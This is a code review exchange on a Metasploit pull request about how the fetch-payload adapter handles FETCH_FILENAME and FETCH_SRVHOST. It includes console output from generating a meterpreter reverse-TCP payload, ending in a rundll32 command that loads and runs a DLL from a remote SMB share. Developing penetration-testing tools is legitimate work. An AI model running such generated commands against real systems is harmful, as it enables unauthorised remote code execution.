lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -5,19 +5,19 @@ def initialize(*args)
     register_options(
       [
         Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
-        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces.', Rex::Text.rand_text_alpha(rand(8..12))], regex:/^[\S]*$/),
+        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: /^[^\s\/\\]*$/),
         Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
-        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
+        # FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
+        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
```

Comment:
Not a blocker; This UX is a bit weird for me having to specify FETCH_SRVHOST instead of the normal LHOST convention 😄 

```
msf6 payload(cmd/windows/smb/x64/messagebox) > generate -f raw lhost=192.168.123.1
[-] Payload generation failed: One or more options failed to validate: FETCH_SRVHOST.
```

Reply:
This makes sense to me?  
If there is an `LHOST` value (reverse port-enabled payloads), `FETCH_SRVHOST` is optional, and if it is blank we use the `LHOST` value.
If there is no `LHOST` value, we require the `FETCH_SRVHOST` value.

There are a lot of situations where we would like the `LHOST` and `FETCH_SRVHOST` to be different, though.

```
msf6 payload(cmd/windows/smb/x64/meterpreter_reverse_tcp) > show options

Module options (payload/cmd/windows/smb/x64/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   EXITFUNC        process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                       no        Comma-separate list of extensions to load
   EXTINIT                          no        Initialization strings for extensions
   FETCH_FILENAME  test.dll         yes       Payload file name to fetch; cannot contain spaces or slashes.
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/windows/smb/x64/meterpreter_reverse_tcp) > generate -f raw
rundll32 \\10.5.135.201\XgxUu-11BP4H1Dy-9LxxVA\test.dll,0

```